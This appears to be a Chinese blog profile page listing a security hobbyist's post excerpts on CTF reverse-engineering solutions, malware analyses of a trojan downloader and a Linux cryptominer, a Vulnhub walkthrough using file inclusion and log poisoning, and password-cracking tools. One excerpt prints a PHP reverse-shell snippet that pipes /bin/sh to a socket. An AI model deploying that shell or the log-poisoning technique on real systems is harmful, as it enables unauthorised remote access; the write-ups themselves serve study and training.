3 Cosmop01itan

尚未进行身份认证

暂无相关描述

等级
TA的排名 2w+

centos7 3行命令安装powershell

#RegistertheMicrosoftRedHatrepositorycurlhttps://packages.microsoft.com/config/rhel/7/prod.repo|sudotee/etc/yum.repos.d/microsoft.repo#InstallPowerShellsudoyuminstall-ypowershell...

2019-08-03 13:55:07

TrojanDownloader简单分析

这里是WinMain的入口,先读取最后自己最后160解密出要下载的url:注册服务和写入注册表来加入自启动没有下载过就开一个线程去下载执行下载执行并且标记为已下载...

2019-07-27 11:57:45

简单的合并两个文件

windows:比如将文件A和文件B合并变成文件ABtypeB>>A

2019-07-12 10:24:09

kali下fcrackzip使用

首先看一下helproot@kali:~#fcrackzip--helpfcrackzipversion1.0,afast/freezippasswordcrackerwrittenbyMarcLehmann<pcg@goof.com>Youcanfindmoreinfoonhttp://www.goof.com/pcg/marc/...

2019-07-02 12:53:52

ubuntu增加用户并且添加到root组

在root权限下操作:useraddusername-m设置密码passwdusernameEnternewUNIXpassword:123456RetypenewUNIXpassword:123456改变组usermod-grootusername确定是否在root组idusernameuid=1001(username)gid=0(root...

2019-06-29 22:00:39

python sys,os模块总结

根据我个人理解,os模块主要是模拟linux命令行下的各种命令,如mkdir,unlink,renamesys模块主要用于获取python解释器的各种信息,如查询python版本,python解释器路径。os模块常用函数os.remove(filename)/os.unlink(path)用于删除文件os.mkdir()创建文件夹os.listdir()列出文件夹下的...

2019-06-21 12:01:15

DC-5 vulnhub靶机实战

首先是使用virtualbox安装,这里不推荐vmware,会出很多问题。nmap扫一下子网,看靶机的ip地址:发现ip是192.168.240.137,开放了80和111端口。给了提示是个文件包含漏洞,发现在thinkyou.php里面存在,验证一下。可以读到/etc/passwd文件。接下来就可以利用nginx的日志记录功能,将一句话写入到access.log里面,然后用tha...

2019-06-16 22:12:11

php reverseShell

<?php$sock=fsockopen($ip,$port);$descriptorspec=array(0=>$sock,1=>$sock,2=>$sock);$process=proc_open('/bin/sh',$descriptorspec,$pipes);proc_c...

2019-06-12 20:01:24

南邮逆向xor题解

ida反编译:调用了6个函数对输入的字符串进行了加密,进入func1看看:对输入的57个字符进行了xor接下来进入xfun1:很明显对前10个进行了xor,后面的函数几个同理。接下来写python脚本解密:data=[0x15,0x1F,0x12,0x14,0x08,0x3A,0x46,0x2C,0x07,0x1B,0x51,0x13,0x3F,0x57,0x08,0x05,0x3F,...

2019-06-10 16:24:57

c#动态修改代码的crackme

题目运行截图用exeinfo看下有没有混淆:拉进dnSpy反编译:进btnCheck_Click单击过程看下:里面调用了Form1.MetMetMet()函数:在这个函数里面动态生成了一个MetM函数,用form.bb数组里面的内容来填充函数内容,实际上这个MetM才是验证函数那我们要把这个函数修复,动态调试把bb数组的内容复制出来,将MetMett函数的内容替换为bb数组的内...

2019-05-27 22:15:04

linux migrations病毒守付进程分析

首先看main函数进入background()函数相当于fork了新的进程,然后父进程退出,由子进程来执行进入checkmsgger()函数先检查是否存在/etc/httpdz文件,这是个后门文件,下一篇会分析,如果没有,他会在initfiles()函数里下载到机器上执行进入initfiles()函数它先检查是不是root用户,是的话就下载到/etc/initdz,不...

2019-05-16 11:05:37

initdz linux挖坑病毒分析

拉进ida里面反编译一下函数名很清晰,看来是没有去掉符号信息进入checkhost()里面也很清楚,选择一个存活的域名作为baseurl,后面有用到来下载挖坑程序进入checkzigw()函数删除同类的挖坑软件,详细说一下,先pkillzigw进程,改变zigw的属性为可见可修改,使用rm-rf/etc/zigw删除zigw进入initfile()函数,这个函数比较...

2019-05-09 20:00:03

逆向python生成的可执行文件

先安装pyinstallerpipinstallpyinstaller-ihttps://pypi.douban.com/simpl写一个简单的脚本:print'hello,world'pyinstaller基本用法,常用的可选参数如下:--onefile将结果打包成一个可执行文件--onedir将所有结果打包到一个文件夹中,该文件夹包括一个可执行文件和可执行文件执...

2019-05-08 20:20:50

*ctf 逆向math题解

ida反编译一下部分方程(20flag[0]+10flag[1]+12flag[2]+23flag[3]+25flag[4]+12flag[5]+17flag[6]+9flag[7]+6flag[8]+6flag[9]+7flag[10]+20flag[11]+0flag[12]+8flag[13]+15flag[14]+13flag[15]+15flag[16]+1flag[17]+0...

2019-04-24 21:35:32

2019信安国赛逆向easyGo,bbvvmm题解

0x00Reverse–easyGo操作内容:|拖入ida反编译,发现很难识别,google之后,发现解析go符号的idapy脚本https://raw.githubusercontent.com/strazzere/golang_loader_assist/master/golang_loader_assist.py执行之后识别出了main函数,在main函数里面找00000004...

2019-04-23 10:42:10

*ctf box题解

题目给了源码/**main.c*Copyright(C)2019hzshang<hzshang15@gmail.com>**DistributedundertermsoftheMITlicense.*/#include<stdio.h>#include<stdlib.h>#include<str...

2019-04-17 14:24:15

ctf之py反编译求p*q%n==1

拿到一个pyc反编译,分析了一下,要求t1,t2,t3fromflagimportt1,t2,t3N=91080783459224114417419735848141602413276894709356670475166857901383529276788422992031159Ls1=11411269144987772222786703496950992585276983...

2019-04-17 11:13:01

FSG2.0脱壳记录

想要加壳文件的可以评论留言。。1.现用PEId查一下壳,发现是FSG压缩壳2.载入od,是fsg的入口特征3.od往下到jmpdwordptr:[ebx+0xc],下断点4.F9运行,执行到jmp,跳转到这里5.到oep,删除模块分析6.后面用LordPedump,ImportREC修复导入表,这里不再赘述。...

2019-04-04 22:19:57

c/c++字符串混淆工具

python3写的一个工具,欢迎star:https://github.com/lxwAsm/myprojects/tree/master/python/CppStringConfusion

2019-03-26 14:31:21

go base64

import( b64"encoding/base64" "fmt")funcmain(){ s:="12345" enc:=b64.StdEncoding.EncodeToString([]byte(s)) fmt.Println(enc) plain,_:=b64.StdEncoding.DecodeString(enc) fmt.Println(plain) fm...

2019-03-20 00:29:27

查看更多

勋章 我的勋章
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv1
    勤写标兵Lv1
    授予每个自然周发布1篇到3篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。